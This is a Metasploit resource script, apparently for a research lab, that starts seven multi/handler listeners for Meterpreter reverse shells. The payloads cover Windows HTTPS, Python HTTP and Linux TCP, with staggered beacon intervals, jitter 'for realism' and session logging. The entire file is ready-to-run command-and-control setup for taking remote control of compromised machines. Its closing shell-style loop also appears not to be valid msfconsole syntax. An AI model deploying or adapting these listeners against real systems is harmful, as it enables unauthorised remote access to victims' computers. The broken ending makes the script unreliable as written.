# Research Handlers Resource Script
# 10% Jitter added for realism

# 1. Logging
spool /home/kali/Desktop/c2/session_logs.txt
setg ExitOnSession false

# --- WINDOWS HTTPS HANDLERS (4444-4446) ---

# Handler for 10s Windows (Port 4444)
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.56.10
set LPORT 4444
set HttpWait 10
set HttpJitter 10
exploit -j

# Handler for 30s Windows (Port 4445)
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.56.10
set LPORT 4445
set HttpWait 30
set HttpJitter 10
exploit -j

# Handler for 60s Windows (Port 4446)
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.56.10
set LPORT 4446
set HttpWait 60
set HttpJitter 10
exploit -j

# --- PYTHON HTTP HANDLERS (8444-8446) ---

# Handler for 10s Python (Port 8444)
use exploit/multi/handler
set payload python/meterpreter/reverse_http
set LHOST 192.168.56.10
set LPORT 8444
set HttpWait 10
exploit -j

# Handler for 30s Python (Port 8445)
use exploit/multi/handler
set payload python/meterpreter/reverse_http
set LHOST 192.168.56.10
set LPORT 8445
set HttpWait 30
exploit -j

# Handler for 60s Python (Port 8446)
use exploit/multi/handler
set payload python/meterpreter/reverse_http
set LHOST 192.168.56.10
set LPORT 8446
set HttpWait 60
exploit -j

# --- LEGACY TCP HANDLER ---
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.10
set LPORT 4447
exploit -j

# 6. Keep Handlers Alive
echo "[*] Handlers are running. Keeping console alive..."
sessions -l
while true; do sleep 60; done
